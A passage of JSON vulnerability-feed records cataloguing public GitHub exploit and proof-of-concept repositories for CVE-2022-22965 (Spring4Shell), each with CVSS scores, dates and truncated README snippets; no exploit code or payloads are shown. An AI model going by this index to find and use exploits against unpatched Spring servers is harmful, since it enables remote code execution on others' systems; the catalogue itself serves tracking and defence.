"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T12:41:29", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:31", "id": "B71645C4-F039-552B-A3E1-C7376EB2DF53", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:14:05", "description": "# Spring4Shell-PoC Application\n\nThis application has been contai...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-12T16:30:05", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-12-12T16:50:14", "id": "8AE63777-720A-5FEB-9A8B-B7A6577008DA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:25", "description": "# CVE-2022-22965 PoC - Payara Arbitrary File Download\n\nMinimal e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T15:26:15", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-12-02T13:09:56", "id": "661FCFFE-E5C3-5CF9-9CD5-68869CEDED1E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:53:53", "description": "## Spring-Core JDK9+ RCE\n\n### \u4f7f\u7528\u8bf4\u660e\n```\n\u2570\u2500 ./CVE-2022-22965 -h ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T07:55:26", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:33", "id": "40B1BD3D-722E-5B72-A0D3-98A5729214D3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:56:06", "description": "# CVE-2022-22965-POC\nCVE-2022-22965 spring-co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T10:51:05", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T11:11:14", "id": "DF61600D-38EB-5DD1-862B-290A1B4D1019", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:46", "description": "# CVE-2022-22965\n\n[Spring Framework/CVE-2022-22965](https://vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T06:50:21", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:32", "id": "D09EAEC3-7B66-5E76-BF91-64C048C7D58D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:54", "description": "# Spring4Shell PoC Application\n\nThis is a dockerized application...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:24:28", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:30", "id": "EA9501F7-CC4E-5C60-ACF3-F636E7F54C6F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-04T22:07:19", "description": "= Spring Framework version override showcase\n\nThis repository sh...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T06:16:20", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T06:44:44", "id": "18E406F3-7737-558F-9993-BD12421447B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:34", "description": "# Spring4Shell - CVE-2022-22965\n\n## Build\n- let's clone the repo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T16:43:03", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-03T05:02:36", "id": "A6262D7C-E486-57FA-BFE3-D7774CB085C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:17", "description": "# CVE-2022-22965\n### 2022.04.02 16:44\n\u4f18\u5316\u4e86POC\uff0c\u4e0d\u518d\u662f\u4e00\u6b21\u6027\u9a8c\u8bc1\nOptimized ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T03:17:48", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:34", "id": "866A8BD8-7D36-53DA-AA66-A0064438E2A5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-19T17:58:12", "description": "# CVE-2022-22965\n## Poc&amp;Exp,\u652f\u6301\u6279\u91cf\u626b\u63cf\n\n### \u4f7f\u7528\n```\n -a string\n ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-03T16:39:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-19T16:17:58", "id": "F46FFDD3-4C3B-5BD6-A69D-43F2CA80D469", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:56:23", "description": "# CVE-2022-22965 PoC\n\nMinimal example of how to reproduce CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T13:21:49", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-05-18T10:10:57", "id": "608612F7-69E9-5491-B453-5DE098B798CA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:26", "description": "![](images/Spring\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u5206\u6790-CVE-2022-229...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T15:41:26", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T15:59:01", "id": "AF11EF27-730D-5BA1-8B1D-7676A6FFCEAF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-09T23:28:47", "description": "# CVE-2022-22965\nSpring4Shell (CVE-2022-22965)\n\n## Usage\n\n### 1....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T12:37:32", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-08-09T21:35:18", "id": "1F4670D2-70D1-5F68-B5BB-2674FB754D26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:06", "description": "# Spring4ShellPoC\nSpring4Shell PoC (CVE-2022-22965)\n\nJust playin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T09:13:11", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T09:21:07", "id": "679F3E9E-1555-5391-86FF-CD3D67D80BDD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:53:40", "description": "# CVE-2022-22965\nSpring Framework RCE (CVE-2022-22965) Nmap (NSE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T00:08:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:41", "id": "B158F1AE-13DF-5F49-88D5-73B5B6183926", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:53:20", "description": "# Spring4Shell\n![IMAGE](Images/2022041117093...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T12:37:58", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:48", "id": "D088978F-AFD3-56B5-A461-39DCB022A11E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-02T18:00:26", "description": "# Spring4Shell: CVE-2022-22965 RCE\n\n## Java Spring framework RCE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-09-02T10:41:05", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-02T10:41:30", "id": "5C9561BE-D9BB-58D0-8E51-09DDD257BC72", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:32", "description": "<h1 align=\"center\">\n <br>\n go-scan-spring\n <br>\n <br>\n</h1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T21:01:26", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-11-09T18:15:41", "id": "402AA694-D65B-59F0-9CAC-8D4AA40893B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:56", "description": "# CVE-2022-22965\u53ca\u5b98\u65b9\u4fee\u590d\u65b9\u6848\u5df2\u51fa\u3002\u6211\u662f\u4fee\u590d\u65b9\u6848\u51fa\u6765\u4e86\u624d\u653e\u7684\u5de5\u5177\u54c8\uff0c\u5404\u4f4d\u522b\u4e71\u641e\n\n\n![](https:/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T02:00:18", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", 